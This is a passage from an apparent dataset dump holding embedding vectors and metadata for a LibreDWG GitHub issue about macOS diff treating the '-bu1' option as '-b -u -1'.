0.017585529014468193, 0.004206306766718626, 0.005677633918821812, -0.014727353118360043, 0.0005257883458398283, -0.004037350416183472, 0.010489366948604584, 0.0032365680672228336, -0.02331596240401268, 0.004026790615171194, 0.013432021252810955, 0.008842043578624725, 0.010334490798413754, -0.0009952578693628311, 0.009433390572667122, -0.012376044876873493, 0.01239012461155653, 0.020007235929369926, 0.027596186846494675, 0.014755512587726116, -0.006364018656313419, -0.010200733318924904, 0.004660376347601414, -0.019246932119131088, 0.008975801058113575, -0.009215155616402626, 0.03311542421579361, 0.00510740652680397, 0.014600635506212711, 0.0004712295194622129, -0.005086286924779415, 0.019796039909124374, -0.02761026658117771, 0.0010832559783011675, 0.015220141969621181, -0.013199706561863422, 0.0006811048951931298, 0.0008905402501113713, -0.008454851806163788, -0.01547357626259327, -0.005431239493191242, 0.009229235351085663, 0.010193693451583385, 0.009813542477786541, 0.019964996725320816, 0.011320068500936031, -0.003780395956709981, 0.00026729406090453267, 0.012446443550288677, -0.006617452949285507, -0.01786712370812893, -0.009208115749061108, 0.0033808848820626736, -0.0019887557718902826, -0.006240821443498135, -0.014656954444944859, 0.010031777434051037, 0.0004782693868037313, -0.005103886593133211, 0.004699095617979765, -0.021077292039990425, -0.006423857528716326, -0.017979761585593224, 0.023104766383767128, 0.0026962601114064455, -0.009433390572667122, 0.014516158029437065, -0.0013375702546909451, 0.005037008319050074, -0.015529895201325417, 0.026117820292711258, -0.005262283142656088, 0.011200391687452793, 0.0048539722338318825, 0.02686404250562191, -0.009890980087220669, 0.016782987862825394, 0.009271473623812199, 0.009764263406395912, 0.008314055390655994, 0.0037099975161254406, -0.0028775359969586134, -0.020767537876963615, 0.022443020716309547, 0.021077292039990425, 0.006677291821688414, -0.01861334592103958, -0.01502302661538124, 0.02220366708934307, -0.023203324526548386, 0.001383329275995493, 0.006381618324667215, -0.0012812515487894416, 0.004149987827986479, -0.0038578342646360397, 0.009503789246082306, -0.03525553643703461, -0.02362571470439434, 0.0025554632302373648, -0.006226741708815098, 0.015360938385128975, -0.0034671230241656303, -0.02824385277926922, 0.0023354680743068457, 0.0215841606259346, 0.00683568837121129, -0.02500552497804165, -0.001490686903707683, 0.01141158677637577, -0.004223905969411135, -0.0021594720892608166, -0.020204350352287292, -0.009433390572667122, 0.014058567583560944, -0.014178245328366756, -0.00602962588891387, -0.0032770473044365644, -0.0026276216376572847, 0.02331596240401268, -0.007265118416398764, -0.005427719559520483, 0.007321437355130911, -0.011721340008080006, 0.0062971399165689945, -0.013129308819770813, -0.017670007422566414, 0.013847372494637966, 0.018697824329137802, 0.0008456612122245133, 0.031313225626945496, -0.004850452300161123, 0.017655927687883377, 0.0018813982605934143, 0.0035252016969025135, 0.0016455634031444788, 0.04153507575392723, 0.006666732020676136, -0.003563920734450221, -0.018782302737236023, 0.015487655997276306, 0.003995111212134361, 0.01329826470464468, -0.015656612813472748, -0.0077508678659796715, 0.006663212087005377, 0.012460523284971714, 0.023287802934646606, 0.005952187813818455, -0.009609386324882507, 0.011531263589859009, 0.0021436323877424, 0.03767724335193634, -0.003702957648783922, 0.004396382253617048, 0.02517448179423809, -0.0003352725470904261, 0.002954974304884672, 0.006782889366149902, 0.008222537115216255, -0.0077156685292720795, 0.025540553033351898, -0.01489630900323391, -0.014199364930391312, 0.008250696584582329, -0.02230222523212433, -0.006374578457325697, 0.015107504092156887, 0.006205622106790543, 0.00698000518605113, 0.01786712370812893, 0.011045514605939388, 0.013636177405714989, 0.00877868477255106, 0.010052897036075592, 0.006754729896783829, 0.030750036239624023, -0.03759276494383812, -0.012742117047309875, -0.017881203442811966, -0.005462918896228075, 0.0007959423237480223, -0.013692496344447136, 0.0040338304825127125, -0.0009706184500828385, 0.005892348941415548, -0.007483353838324547, 0.001909557613544166, -0.017543289810419083, -0.014952627941966057, 0.010271131992340088, 0.02872256189584732, -0.003451283322647214, 0.02180943638086319, -0.017923442646861076, 0.02100689336657524, -0.02199247106909752, -0.004097188822925091, -0.00200107553973794 ]
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
macOS diff -1 deprecation -bu1 interpretated as -b -u -1
macOS diff -1 deprecation
https://api.github.com/repos/LibreDWG/libredwg/issues/541/comments
0
2022-12-19T11:10:21
2022-12-23T08:37:10Z
https://github.com/LibreDWG/libredwg/issues/541
1,502,751,324
541
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : macOS diff -1 deprecation Issue date: --- start body --- macOS diff -1 deprecation -bu1 interpretated as -b -u -1 --- end body ---
199
[ -0.04567275941371918, -0.0035282799508422613, -0.00831493642181158, 0.04216860607266426, 0.038219012320041656, 0.05538341775536537, 0.01343010738492012, 0.05879848077893257, 0.0015803948044776917, -0.02103975974023342, 0.0010792713146656752, -0.02077249251306057, -0.004666015971451998, 0.001274152658879757, -0.028849860653281212, 0.038605064153671265, 0.004636319354176521, 0.028419265523552895, 0.012791639193892479, -0.02785503678023815, 0.01627351902425289, 0.004859040956944227, 0.003127381205558777, 0.03447728976607323, -0.025672366842627525, -0.009822018444538116, -0.017847416922450066, 0.011433037929236889, -0.03302217647433281, 0.0088420445099473, 0.018114684149622917, 0.022613657638430595, -0.010156101547181606, -0.002403536345809698, 0.008329784497618675, 0.01090592984110117, 0.038248706609010696, 0.05621491000056267, -0.022866075858473778, 0.03409124165773392, -0.0644407570362091, -0.04311888664960861, -0.003715737257152796, 0.03290339186787605, -0.005775911267846823, -0.014135392382740974, -0.024024227634072304, 0.015122790820896626, -0.018931329250335693, 0.0039644427597522736, -0.012301651760935783, -0.0204161386936903, -0.018292861059308052, 0.0015887467889115214, 0.0020119177643209696, -0.022034581750631332, 0.021663378924131393, 0.006755886133760214, -0.023949986323714256, 0.003867930267006159, -0.02080218866467476, 0.037625089287757874, -0.00535645242780447, 0.00034220231464132667, -0.005586598068475723, 0.03910989686846733, -0.014432353898882866, 0.011358797550201416, -0.02654840424656868, -0.012205138802528381, 0.0013186970027163625, -0.0033519587013870478, -0.008374328725039959, 0.017773177474737167, 0.012309075333178043, -0.02723141759634018, 0.07465625554323196, -0.013548891991376877, -0.01805528998374939, 0.01479613222181797, -0.024365734308958054, 0.0031626455020159483, -0.05128534138202667, 0.014573411084711552, -0.0015711146406829357, 0.0016527792904525995, 0.003704601200297475, -0.06461893767118454, -0.0025334572419524193, 0.0020044937264174223, -0.019480708986520767, 0.014558563008904457, 0.03866445645689964, -0.03024558164179325, 0.013133144937455654, 0.02274729125201702, -0.02010432817041874, 0.011960145086050034, -0.04353463277220726, -0.050127189606428146, -0.03714994713664055, -0.002637394005432725, -0.0021882387809455395, 0.007153072860091925, 0.00015938509022817016, 0.016585329547524452, 0.034566380083560944, 0.02454391121864319, -0.015887467190623283, 0.11480551958084106, 0.012992088682949543, 0.0049184332601726055, -0.021707924082875252, -0.024291492998600006, -0.0139646390452981, 0.017966201528906822, -0.002050893846899271, -0.025642670691013336, -0.02420240454375744, 0.023549087345600128, -0.00853023398667574, -0.030008012428879738, -0.02344515174627304, -0.009985348209738731, -0.02415786124765873, -0.01071290485560894, 0.0006992527632974088, -0.01412796787917614, 0.0022439192980527878, 0.003329686587676406, -0.039644431322813034, 0.01763954386115074, -0.012026961892843246, 0.003138517262414098, -0.025108138099312782, -0.021930644288659096, 0.0009864707244560122, 0.0374172143638134, -0.053215593099594116, -0.01741682179272175, -0.023252125829458237, -0.04801875725388527, 0.030022859573364258, 0.017149556428194046, -0.0394662506878376, -0.0037974019069224596, -0.0029287878423929214, 0.001928397105075419, 0.036912377923727036, 0.006592556834220886, -0.006065449211746454, -0.033556707203388214, 0.032873693853616714, 0.0028768195770680904, 0.07887311279773712, -0.0015803948044776917, -0.011536974459886551, 0.004599199164658785, 0.01444720197468996, -0.0005614437977783382, -0.008604474365711212, 0.01942131668329239, 0.0065480126067996025, 0.01020064577460289, -0.042020127177238464, 0.0020174856763333082, 0.030468303710222244, 0.012271955609321594, -0.005627430509775877, 0.024009378626942635, -0.027676859870553017, 0.00586499972268939, -0.011826512403786182, 0.01308117713779211, -0.014417505823075771, 0.007338673807680607, -0.010074436664581299, -0.009391424246132374, 0.02411331608891487, -0.0314185805618763, -0.017075316980481148, 0.003255446208640933, -0.008760379627346992, 0.0017891961615532637, 0.03616997227072716, -0.03599179536104202, 0.023682720959186554, 0.013534043915569782, -0.01380131021142006, -0.038931719958782196, -0.014157664030790329, 0.00535274064168334, 0.0009892546804621816, -0.006607404910027981, 0.03524939343333244, 0.01801074668765068, -0.0003616904723457992, -0.00520054716616869, 0.0005363876698538661, -0.0035152880009263754, 0.023296670988202095, -0.023935139179229736, -0.003077268833294511, 0.024083619937300682, -0.022301847115159035, 0.0028842436149716377, -0.000029870203434256837, 0.02046068385243416, 0.012903000228106976, -0.04599941521883011, 0.02069825306534767, -0.010007619857788086, -0.0009660545620135963, 0.03498212620615959, -0.012019537389278412, 0.02758777141571045, 0.036556024104356766, 0.022955164313316345, -0.031210707500576973, -0.01974797435104847, 0.047068480402231216, -0.015560809522867203, 0.020312203094363213, -0.020638860762119293, -0.031181011348962784, 0.028077758848667145, 0.003823386039584875, 0.020534923300147057, 0.00009268463327316567, 0.013853278011083603, 0.02721656858921051, 0.008084790781140327, 0.010935625992715359, 0.007891765795648098, -0.002709778491407633, 0.008916284888982773, -0.00006548244709847495, -0.01771378517150879, -0.03337853029370308, -0.014937189407646656, -0.016080493107438087, 0.04291101172566414, -0.023326367139816284, -0.03132949396967888, 0.022361239418387413, -0.00023200157738756388, 0.031121619045734406, -0.00834463257342577, -0.023742113262414932, 0.03174524009227753, 0.00818872731178999, -0.025093290954828262, 0.015842923894524574, 0.02688991092145443, -0.021381264552474022, -0.03225007653236389, 0.03753599897027016, 0.05704640597105026, -0.008210999891161919, -0.048879947513341904, 0.00954732857644558, 0.048850253224372864, -0.02179701253771782, 0.035576049238443375, 0.0333191379904747, -0.0475139245390892, -0.018901633098721504, 0.02147035486996174, -0.010564424097537994, -0.0014588258927688003, -0.0033092705998569727, -0.05983784794807434, -0.025583278387784958, 0.011811664327979088, -0.008381753228604794, -0.004443294368684292, 0.029651658609509468, 0.02999316342175007, 0.02752837911248207, -0.018560126423835754, -0.029518024995923042, 0.06485650688409805, -0.00935430359095335, 0.006945199333131313, 0.002262479392811656, 0.004369053523987532, -0.0029863242525607347, 0.010215493850409985, -0.012182867154479027, -0.02757292427122593, -0.006536876317113638, 0.002821139292791486, 0.02308879792690277, 0.015204455703496933, -0.019480708986520767, -0.004922145511955023, 0.02721656858921051, -0.01172999944537878, -0.05072111263871193, -0.018188923597335815, 0.011351373046636581, -0.003155221464112401, 0.05556159466505051, -0.054254960268735886, -0.0004802432667929679, 0.03227977082133293, 0.02005978487432003, 0.029532872140407562, -0.01513763889670372, 0.024336038157343864, 0.04567275941371918, -0.04368311166763306, 0.011455309577286243, -0.010646088048815727, 0.0014662499306723475, -0.023638177663087845, 0.036882683634757996, -0.04365341737866402, 0.04861268401145935, 0.010156101547181606, -0.04935508966445923, -0.016258670017123222, -0.055294327437877655, -0.006592556834220886, 0.038545671850442886, -0.02929530292749405, -0.04466308653354645, 0.01258376520127058, -0.030884049832820892, -0.03717964515089989, -0.01377161405980587, -0.025583278387784958, 0.007089968305081129, 0.013548891991376877, 0.022049430757761, -0.03988200053572655, -0.021514898166060448, 0.0048107849434018135, 0.026325684040784836, -0.009718081913888454, 0.01594686135649681, 0.007869493216276169, -0.013727069832384586, -0.009963075630366802, 0.008262968622148037, -0.01943616382777691, -0.006711341440677643, 0.0321015939116478, -0.002223503077402711, 0.06978607177734375, 0.0008778939954936504, 0.006147113628685474, 0.019896455109119415, 0.011210315860807896, -0.026429619640111923, -0.004992674104869366, -0.000476995250210166, -0.07002364099025726, 0.0029659082647413015, 0.01326677855104208, 0.00016077709733508527, -0.03720933943986893, 0.03227977082133293, 0.011744847521185875, -0.017476214095950127, -0.01599140465259552, -0.0010913354344666004, -0.04941448196768761, -0.0247814804315567, -0.009688385762274265, 0.017164405435323715, 0.04104015231132507, 0.0018411645432934165, 0.048790860921144485, -0.04145589843392372, 0.0009957507718354464, 0.0004811712715309113, 0.03334883600473404, 0.0031422292813658714, 0.016095342114567757, -0.048196934163570404, 0.0032591582275927067, 0.022910619154572487, -0.051582302898168564, 0.03328944370150566, -0.02108430303633213, -0.017238644883036613, 0.02206427790224552, 0.012836183421313763, -0.02277698740363121, -0.02448451891541481, -0.02449936605989933, -0.023296670988202095, -0.04368311166763306, -0.009280063211917877, 0.030824657529592514, 0.0020044937264174223, -0.003580248448997736, 0.01463280338793993, 0.022316696122288704, -0.00008781259384704754, -0.01175227202475071, 0.042703136801719666, 0.012346195988357067, 0.004176028538495302, 0.040357138961553574, -0.031953115016222, -0.059748757630586624, -0.00006478644354501739, 0.022598810493946075, -0.014966885559260845, 0.003934746608138084, 0.0038939143996685743, 0.02412816509604454, 0.033497314900159836, 0.001969229429960251, -0.0030995411798357964, 0.0210991520434618, -0.040327440947294235, 0.031804632395505905, 0.02760262042284012, -0.030186189338564873, -0.011254861019551754, 0.00527478801086545, 0.03239855542778969, -0.006737325806170702, -0.021232783794403076, 0.005482661072164774, 0.06236202269792557, -0.0034725996665656567, -0.03637784719467163, 0.05110716447234154, 0.040357138961553574, 0.016095342114567757, -0.007271857466548681, -0.015412328764796257, -0.005890984088182449, -0.021277328953146935, 0.03667480871081352, 0.034566380083560944, 0.002637394005432725, 0.007787828799337149, 0.0020044937264174223, -0.007427762728184462, -0.016733810305595398, -0.0029046598356217146, -0.034536682069301605, 0.0015089382650330663, -0.007780404761433601, -0.04620729014277458, 0.0051374430768191814, 0.030408911406993866, -0.0037194492761045694, 0.0030178765300661325, 0.004216860514134169, -0.019465859979391098, -0.03376458212733269, -0.013147993013262749, 0.04365341737866402, -0.014239328913390636, -0.0059689367190003395, 0.011299405246973038, 0.012858455069363117, 0.013259354047477245, 0.0254644937813282, 0.0312701016664505, 0.014410082250833511, -0.016600176692008972, -0.006896942853927612, 0.016793202608823776, -0.013660253025591373, 0.023059101775288582, -0.009480512700974941, 0.0031607896089553833, -0.008997948840260506, 0.023266974836587906, -0.036259062588214874, -0.02614750526845455, -0.01866406388580799, 0.00027352984761819243, -0.00027399384998716414, -0.04255465790629387, -0.008723258972167969, -0.03323005139827728, -0.02896864525973797, -0.023667873814702034, -0.0003159861371386796, 0.008040246553719044, -0.018263164907693863, 0.05315620079636574, -0.00647748401388526, 0.004161180462688208, 0.01765439286828041, -0.012969816103577614, 0.021217936649918556, 0.028790468350052834, 0.00655914843082428, 0.010193221271038055, 0.026429619640111923, 0.04154498502612114, 0.013927518390119076, 0.010757449083030224, 0.02654840424656868, -0.01937677152454853, 0.012123474851250648, -0.01603594981133938, -0.05196835473179817, 0.03204220160841942, 0.0014708900125697255, -0.013326170854270458, 0.01832255721092224, -0.04074319079518318, -0.006878382991999388, -0.022019734606146812, -0.001592458807863295, -0.03712025284767151, 0.022643353790044785, -0.015041125938296318, 0.024321189150214195, 0.004666015971451998, 0.007294129580259323, -0.013882974162697792, -0.007282993756234646, 0.013890398666262627, -0.007316401693969965, 0.042376480996608734, 0.023326367139816284, -0.011945297010242939, 0.019629189744591713, -0.008329784497618675, 0.004409885965287685, -0.010512455366551876, -0.01600625365972519, 0.019941000267863274, -0.01732773333787918, 0.008945981040596962, 0.010965322144329548, -0.002650385955348611, 0.004870177246630192, 0.01903526484966278, -0.004747680388391018, -0.005998632870614529, -0.025286316871643066, -0.026281138882040977, -0.025583278387784958, 0.014150240458548069, -0.012776791118085384, 0.010943050496280193, -0.00022179351071827114, 0.04225769639015198, -0.005185699090361595, -0.011626062914729118, 0.01242043636739254, 0.012427860870957375, -0.017431670799851418, 0.02207912690937519, 0.006143401842564344, 0.007245873101055622, 0.017966201528906822, -0.0014346977695822716, -0.015018854290246964, -0.014855525456368923, 0.03323005139827728, -0.01242043636739254, 0.0022884635254740715, -0.020831884816288948, 0.02920621447265148, -0.018901633098721504, -0.03064648061990738, -0.005857575684785843, 0.01397206261754036, -0.006217642221599817, 0.014484322629868984, -0.0056459903717041016, -0.016110189259052277, 0.017075316980481148, -0.001576682785525918, 0.015011429786682129, -0.004521246533840895, -0.01602110080420971, -0.011210315860807896, -0.02484087273478508, -0.02311849407851696, 0.009822018444538116, 0.017891962081193924, -0.014335841871798038, -0.013697372749447823, -0.030794961377978325, 0.0122571075335145, -0.014031455852091312, 0.016793202608823776, 0.01662987284362316, 0.009569601155817509, 0.00500752218067646, 0.02316303737461567, 0.01051987987011671, 0.003127381205558777, 0.013675101101398468, 0.022331543266773224, -0.0017019635997712612, 0.00850053783506155, 0.019154049456119537, 0.019837062805891037, 0.0008802139782346785, -0.028716227039694786, -0.00938399974256754, 0.03771417587995529, 0.004465566482394934, -0.022227607667446136, 0.004591775126755238, -0.021930644288659096, 0.011989841237664223, 0.046444859355688095, 0.0019042689818888903, 0.011150923557579517, -0.004799648653715849, -0.019183745607733727, 0.004398750141263008, -0.011455309577286243, -0.008945981040596962, 0.01175969559699297, -0.024306342005729675, 0.01548656914383173, 0.02556842938065529, 0.0197331253439188, 0.012108626775443554, 0.000009127812518272549, -0.007598515599966049, -0.008515385910868645, -0.01839679665863514, -0.02959226444363594, 0.02920621447265148, -0.007049135863780975, 0.0027153464034199715, -0.0037194492761045694, 0.027394745498895645, 0.02726111374795437, -0.0088420445099473, -0.016095342114567757, 0.0020026376005262136, -0.011900752782821655, -0.0018987009534612298, -0.007372082211077213, -0.015100519172847271, -0.020252808928489685, -0.014521442353725433, 0.037239037454128265, 0.02758777141571045, 0.01023776549845934, 0.015248999930918217, -0.05000840499997139, 0.00026401778450235724, 0.0006041321321390569, 0.030468303710222244, 0.00815160758793354, -0.00903506949543953, -0.02069825306534767, 0.030156493186950684, -0.003285142360255122, -0.0004881313070654869, -0.010943050496280193, -0.024647846817970276, -0.02316303737461567, -0.008099638856947422, 0.003754713572561741, -0.01667441800236702, 0.0009275423362851143, -0.047781188040971756, 0.00458063930273056, 0.01567959412932396, 0.0105495760217309, -0.050839897245168686, 0.0069266390055418015, 0.006058025173842907, -0.012346195988357067, 0.02452906221151352, 0.01207150612026453, 0.006109993439167738, -0.022569114342331886, -0.031953115016222, 0.014803556725382805, 0.010809417814016342, 0.006028329022228718, 0.006960047408938408, -0.041634075343608856, 0.00511517096310854, -0.021856404840946198, -0.017936505377292633, 0.009146430529654026, -0.013526620343327522, 0.016511088237166405, -0.028107455000281334, 0.00025868177181109786, 0.021663378924131393, 0.014499170705676079, -0.030141644179821014, 0.01934707537293434, -0.01106183510273695, -0.0072755697183310986, 0.0023200158029794693, -0.022183062508702278, -0.022034581750631332, 0.009621569886803627, 0.0033111264929175377, 0.005152291152626276, -0.002559441374614835, 0.009272638708353043, 0.00865644309669733, 0.01741682179272175, 0.02004493586719036, -0.008225847966969013, 0.011358797550201416, -0.030497999861836433, 0.018589822575449944, -0.025434797629714012, -0.0076541961170732975, -0.010839113965630531, 0.0005489157629199326, -0.030394062399864197, 0.0028972357977181673, -0.03061678446829319, -0.026592949405312538, -0.005798183381557465, -0.014989158138632774, -0.00801797490566969, -0.015828074887394905, 0.0002429056476103142, 0.0025297452230006456, -0.0032832862343639135, 0.013378138653934002, -0.00511888274922967, 0.00937657617032528, 0.0035282799508422613, 0.013044056482613087, -0.037268731743097305, 0.009428543969988823, 0.006150825880467892, 0.0010124548571184278, 0.040357138961553574, -0.030126797035336494, 0.014640227891504765, 0.0025408812798559666, -0.027973823249340057, -0.03572453185915947, -0.014714468270540237, -0.019926151260733604, -0.007197617087513208, 0.014580835588276386, -0.025999024510383606, 0.014217056334018707, 0.009718081913888454, -0.016511088237166405, 0.011455309577286243, -0.04017896205186844, -0.007268145680427551, 0.02004493586719036, 0.03804083541035652, -0.00951020885258913, 0.026370227336883545, -0.0025297452230006456, -0.026771126314997673, -0.004146332386881113, 0.009628993459045887, 0.013392986729741096, 0.03275490924715996, 0.02285122685134411, 0.014365538023412228, 0.0031292373314499855, -0.001805900246836245, -0.003409495111554861, 0.001476458040997386, 0.019599493592977524, -0.013652828522026539, -0.0160507969558239, -0.01324450597167015, 0.0008690779213793576, -0.005586598068475723, -0.012130898423492908, 0.0038605062291026115, 0.018144380301237106, -0.04329706355929375, -0.0010542151285335422, -0.0296368096023798, 0.007234737277030945, 0.018530430272221565, -0.010690632276237011, -0.011923025362193584, 0.0065962690860033035, 0.025761455297470093, -0.03094344213604927, -0.018292861059308052, -0.014766436070203781, 0.04481156915426254, -0.029161671176552773, 0.006544300355017185, -0.008507962338626385, -0.011618639342486858, -0.0029881803784519434, -0.02858259528875351, -0.012858455069363117, 0.020906126126646996, -0.01207150612026453, -0.04311888664960861, -0.03364579752087593, 0.021915797144174576, -0.004550943151116371, -0.009777474217116833, -0.013207386247813702, -0.043386150151491165, 0.03138888627290726, -0.0014467618893831968, 0.02547934092581272, -0.004046107642352581, 0.02454391121864319, 0.01005216408520937, 0.011343949474394321, 0.00904249306768179, -0.02139611355960369, 0.006622252985835075, 0.02111399918794632, -0.009628993459045887, 0.011974993161857128, 0.005055778194218874, -0.008352057076990604, -0.0002519537229090929, -0.02343030273914337, 0.0035654003731906414, 0.002912083873525262, 0.0012648726115003228, 0.009554753080010414, 0.00834463257342577, 0.041634075343608856, -0.035576049238443375, -0.021618835628032684, 0.000411106797400862, -0.005712806712836027, -0.0025093290023505688, 0.006659373175352812, 0.003782553831115365, 0.02617720142006874, -0.014684772118926048, -0.00749086681753397, -0.027157176285982132, -0.020267657935619354, -0.0063995313830673695, -0.013444955460727215, -0.031804632395505905, 0.023623328655958176, -0.008953404612839222, 0.006406955420970917, 0.02038644254207611, 0.005679398775100708, 0.0027376185171306133, 0.017253493890166283, -0.0394662506878376, -0.017446517944335938, 0.006622252985835075, -0.008292664773762226, -0.013125721365213394, -0.0022476313170045614, 0.045821238309144974, 0.017134709283709526, -0.012182867154479027, -0.020861582830548286, 0.00434678141027689, -0.033497314900159836, 0.018485885113477707, -0.020876429975032806, 0.0038085379637777805, -0.02249487303197384, -0.04653394967317581, -0.012494676746428013, 0.008678714744746685, 0.004172316286712885, 0.004216860514134169, 0.010341702029109001, -0.011009867303073406, 0.002464784774929285, 0.06408440321683884, -0.0006213002488948405, 0.0065480126067996025, 0.025954481214284897, -0.05199804902076721, 0.013259354047477245, 0.026385076344013214, -0.019540101289749146, -0.0028322753496468067, 0.005337892100214958, 0.002810003003105521, 0.017535606399178505, 0.017773177474737167, 0.048879947513341904, -0.03848627954721451, -0.03308156877756119, 0.00706398393958807, 0.018857087939977646, -0.01494461391121149, -0.03177493438124657, -0.04190134257078171, -0.007921461947262287, -0.009614145383238792, -0.005749926902353764, 0.02384605072438717, -0.021158544346690178, 0.008203575387597084, -0.01190817728638649, 0.013385563157498837, -0.01124743651598692, 0.03498212620615959, 0.008225847966969013, 0.011009867303073406, -0.0144397784024477, 0.007412914652377367, 0.009896259754896164, 0.010861385613679886, 0.031121619045734406, -0.021693075075745583, 0.005757350940257311, 0.014677347615361214, 0.03732812777161598, -0.028731076046824455, 0.0029677641578018665, -0.025954481214284897, 0.015397480688989162, 0.010312005877494812, -0.02005978487432003, -0.021663378924131393, 0.0004572751058731228, 0.030527696013450623, 0.029161671176552773, -0.007750708609819412, -0.005690534599125385, 0.011707727797329426, -0.0025353131350129843, 0.0037194492761045694, -0.028641987591981888, -0.006065449211746454, 0.006329003255814314, 0.000651924463454634, -0.054581619799137115, -0.007368369959294796, 0.022583961486816406, 0.0028248513117432594, -0.04837511479854584, 0.016867442056536674, 0.028805315494537354, 0.022880923002958298, 0.021366417407989502, -0.022524569183588028, -0.0020861581433564425, -0.006722477730363607, 0.014395234175026417, -0.02313334122300148, -0.014417505823075771, -0.03201250731945038, -0.013363290578126907, -0.008597050793468952, -0.036585722118616104, 0.0017001075902953744, 0.0013372570974752307, -0.0032907105050981045, 0.028493504971265793, -0.029844682663679123, -0.010326853953301907, 0.006102569401264191, 0.009094461798667908, -0.02035674639046192, 0.03667480871081352, -0.021232783794403076, 0.0037806977052241564, 0.00010938874765997753, -0.007583667524158955, 0.02077249251306057, 0.009918531402945518, -0.012212563306093216, 0.00937657617032528, 0.014068575575947762, 0.007936310023069382, -0.006997167598456144, -0.004328221548348665, -0.014291297644376755, -0.00044358702143654227, 0.013608284294605255, -0.0114033417776227, 0.017921658232808113, 0.013534043915569782, 0.013125721365213394, 0.030794961377978325, 0.005159715190529823, 0.023667873814702034, -0.0048627532087266445, -0.000583715969696641, 0.01697137951850891, -0.04617759585380554, 0.012940119951963425, -0.026088112965226173, 0.025746606290340424, 0.01137364562600851, -0.011893329210579395, -0.01361570879817009, -0.02625144273042679, 0.01039367076009512, -0.0002528817276470363, -0.025286316871643066, -0.01106183510273695, 0.033467620611190796, 0.006091433577239513, 0.03376458212733269, -0.04733574762940407, 0.027721405029296875, 0.03198280930519104, -0.021217936649918556, 0.0367342010140419, -0.028434112668037415, -0.009606721810996532, 0.009725506417453289, -0.007546547334641218, -0.02784018963575363, 0.007735860534012318, 0.028686530888080597, -0.029399240389466286, -0.006640813313424587, -0.032814301550388336, -0.01832255721092224, 0.004109211731702089, 0.009732929989695549, -0.008745531551539898, 0.00242580845952034, 0.025791151449084282, 0.0018569406820461154, 0.011358797550201416, -0.009473088197410107, 0.006039465311914682, 0.004736544098705053, -0.008404024876654148, -0.026964152231812477, 0.007795252837240696, -0.030022859573364258, -0.016258670017123222, 0.016585329547524452, 0.02657810039818287, -0.0006774446228519082, -0.0024889130145311356, -0.0012091922108083963, -0.015397480688989162, 0.016065645962953568, 0.022702746093273163, -0.022583961486816406, -0.003175637684762478, -0.04932539165019989, -0.005148578900843859, 0.01005216408520937, 0.03257673233747482, -0.03732812777161598, -0.030037708580493927, -0.013125721365213394, -0.016570480540394783, -0.03581361845135689, 0.03091374598443508, 0.010304582305252552, -0.0026132657658308744, -0.009369151666760445, -0.00024429766926914454, 0.0011581518920138478, -0.022569114342331886, 0.00003195821773260832, -0.008997948840260506, 0.006711341440677643, -0.0014681059401482344, 0.01124743651598692, 0.013786462135612965, 0.019198594614863396, -0.022955164313316345, -0.010111556388437748, 0.0005971720675006509, -0.013073752634227276, 0.028345024213194847, 0.006618541199713945, -0.029651658609509468, -0.001969229429960251, 0.030884049832820892, -0.01431356929242611, 0.0068227024748921394, 0.01291784830391407, -0.01875315234065056, 0.0007294129463844001, 0.0006152681889943779, -0.021945493295788765, -0.042317088693380356, -0.03227977082133293, -0.028152000159025192, 0.006351275369524956, -0.0027023544535040855, -0.015338088385760784, -0.017283190041780472, -0.0353681780397892, 0.013422682881355286, 0.060758430510759354, -0.007253297138959169, -0.03848627954721451, -0.015575657598674297, 0.019243139773607254, 0.01636260747909546, -0.011284557171165943, -0.009205822832882404, -0.021678227931261063, 0.012873303145170212, -0.012658006511628628, 0.021500051021575928, 0.0006579564651474357, 0.008470841683447361, 0.00267637032084167, -0.016095342114567757, 0.006113705690950155, -0.013192538172006607, -0.002071310067549348, 0.01276194304227829, -0.018842240795493126, -0.0008908860618248582, 0.024677544832229614, -0.006221354473382235, 0.011254861019551754, 0.012190290726721287, 0.019287683069705963, 0.007624499965459108, -0.0023905441630631685, 0.005430692806839943, -0.0014829541323706508, -0.01876799948513508, 0.010415942408144474, -0.013014360330998898, -0.011098955757915974, 0.017951354384422302, 0.016555633395910263, 0.006807854399085045, -0.008626746945083141, -0.03367549180984497, 0.013437531888484955, -0.0005377796478569508, -0.01769893616437912, -0.011425613425672054, 0.016926834359765053, -0.025924785062670708, 0.024959657341241837, 0.002873107558116317, 0.009406272321939468, -0.0160507969558239, 0.009101886302232742, 0.001878284732811153, -0.006681645289063454, 0.03513060882687569, -0.011485005728900433, 0.01765439286828041, 0.03302217647433281, 0.009294911287724972, -0.023667873814702034, -0.01977767050266266, 0.004807072691619396, -0.025776304304599762, 0.00919097475707531, 0.003346390789374709, 0.004402461927384138, 0.0011804240057244897, -0.0346851646900177, -0.0035783923231065273, -0.0031218132935464382, 0.008767803199589252, -0.007676468230783939, 0.00729784183204174, 0.00772843649610877, -0.01105441153049469, 0.003875354304909706, -0.00011779880151152611, -0.0019933576695621014, 0.02650386095046997, -0.019272835925221443, -0.0131108732894063, 0.04534609988331795, -0.0011850640876218677, -0.0144397784024477, 0.003064276883378625, 0.0004106427950318903, 0.028641987591981888, -0.01873830333352089, -0.0135860126465559, -0.0003821066056843847, -0.017283190041780472, 0.008322360925376415, -0.005330468062311411, 0.023979682475328445, -0.00868613924831152, -0.005000098142772913, 0.010126404464244843, 0.02246517688035965, 0.002392400288954377, -0.012999512255191803, 0.009784898720681667, -0.0042354208417236805, 0.002242063172161579, 0.017476214095950127, -0.014105696231126785, 0.005337892100214958, -0.0006964687490835786, 0.014410082250833511, 0.0073312497697770596, 0.009287486784160137, -0.003496727906167507, 0.0015590506372973323, 0.011871056631207466, -0.028092607855796814, -0.0348336435854435, -0.002748754806816578, 0.0006811566418036819, -0.00772843649610877, -0.0018597246380522847, 0.009777474217116833, -0.026978999376296997, -0.027350202202796936, -0.04558366909623146, 0.021589139476418495, -0.02588023990392685, 0.009250367060303688, 0.012472405098378658, -0.014937189407646656, -0.014803556725382805, 0.01516733504831791, 0.0031125331297516823, 0.020327050238847733, 0.0047662402503192425, 0.009525056928396225, -0.018248315900564194, 0.009228094480931759, 0.005805607419461012, 0.006306731142103672, -0.031062226742506027, -0.02828563190996647, -0.01763954386115074, -0.0333191379904747, 0.011366221122443676, 0.001881068805232644, 0.018456188961863518, -0.008225847966969013, 0.01909465715289116, -0.014254176989197731, 0.008144183084368706, 0.004703136160969734, 0.029770443215966225, -0.003845658153295517, -0.017283190041780472, 0.018471037968993187, 0.021351568400859833, -0.002019341802224517, 0.013422682881355286, -0.007190193049609661, 